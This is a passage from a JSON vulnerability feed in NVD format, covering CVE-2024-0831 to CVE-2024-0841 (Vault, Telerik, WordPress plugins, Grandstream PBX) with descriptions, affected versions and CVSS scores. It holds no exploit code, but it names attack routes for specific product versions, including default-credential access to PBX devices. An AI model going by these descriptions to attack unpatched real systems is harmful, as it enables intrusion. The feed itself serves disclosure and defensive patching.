"cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0831", "ASSIGNER" : "security@hashicorp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-532" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration", "name" : "https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration", "name" : "https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311", "name" : "https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311", "name" : "https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240223-0005/", "name" : "https://security.netapp.com/advisory/ntap-20240223-0005/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240223-0005/", "name" : "https://security.netapp.com/advisory/ntap-20240223-0005/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Vault and Vault Enterprise (“Vault”) may expose sensitive information when enabling an audit device which specifies the `log_raw` option, which may log sensitive information to other audit devices, regardless of whether they are configured to use `log_raw`." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:vault:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.15.0", "versionEndExcluding" : "1.15.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:vault:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.15.0", "versionEndExcluding" : "1.15.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-01T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0832", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability", "name" : "https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability", "name" : "https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.telerik.com/products/reporting.aspx", "name" : "https://www.telerik.com/products/reporting.aspx", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.telerik.com/products/reporting.aspx", "name" : "https://www.telerik.com/products/reporting.aspx", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Telerik Reporting versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik Reporting install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:*", "versionEndExcluding" : "18.0.24.130", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-31T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0833", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability", "name" : "https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability", "name" : "https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.telerik.com/teststudio", "name" : "https://www.telerik.com/teststudio", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.telerik.com/teststudio", "name" : "https://www.telerik.com/teststudio", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Telerik Test Studio versions prior to \n\nv2023.3.1330, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik Test Studio install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:telerik_test_studio:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2023.3.1330", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-31T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0834", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784", "name" : "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784", "name" : "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:webtechstreet:elementor_addon_elements:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.12.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0835", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=", "name" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=", "name" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/themes/royal-elementor-kit/", "name" : "https://wordpress.org/themes/royal-elementor-kit/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/themes/royal-elementor-kit/", "name" : "https://wordpress.org/themes/royal-elementor-kit/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Kit theme for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the dismissed_handler function in all versions up to, and including, 1.0.116. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to true and not arbitrary values." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_kit:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.116", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0836", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php", "name" : "https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php", "name" : "https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:radiustheme:review_schema:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.1.14", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-31T08:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0837", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3045497/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php", "name" : "https://plugins.trac.wordpress.org/changeset/3045497/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3045497/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php", "name" : "https://plugins.trac.wordpress.org/changeset/3045497/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a54c2a89-4297-48f5-bbff-e5c20c26a632?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a54c2a89-4297-48f5-bbff-e5c20c26a632?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a54c2a89-4297-48f5-bbff-e5c20c26a632?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a54c2a89-4297-48f5-bbff-e5c20c26a632?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bdthemes:element_pack:*:*:*:*:pro:wordpress:*:*", "versionEndExcluding" : "5.3.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-06T08:15Z", "lastModifiedDate" : "2025-01-17T17:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0838", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121", "name" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121", "name" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the side image URL parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leevio:happy_addons_for_elementor:*:*:*:*:free:wordpress:*:*", "versionEndIncluding" : "3.10.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2024-12-27T15:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0839", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-639" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/feedwordpress/", "name" : "https://wordpress.org/plugins/feedwordpress/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/feedwordpress/", "name" : "https://wordpress.org/plugins/feedwordpress/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key. This makes it possible for unauthenticated attackers to view draft posts that may contain sensitive information." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2024.0428", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:25Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0840", "ASSIGNER" : "disclosure@vulncheck.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vulncheck.com/advisories/grand-stream-param-injection", "name" : "https://vulncheck.com/advisories/grand-stream-param-injection", "refsource" : "", "tags" : [ ] }, { "url" : "https://vulncheck.com/advisories/grand-stream-param-injection", "name" : "https://vulncheck.com/advisories/grand-stream-param-injection", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-29T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0841", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:2394", "name" : "RHSA-2024:2394", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2394", "name" : "RHSA-2024:2394", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2950", "name" : "RHSA-2024:2950", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2950", "name" : "RHSA-2024:2950", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3138", "name" : "RHSA-2024:3138", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3138", "name" : "RHSA-2024:3138", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0841", "name" : "https://access.redhat.com/security/cve/CVE-2024-0841", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : 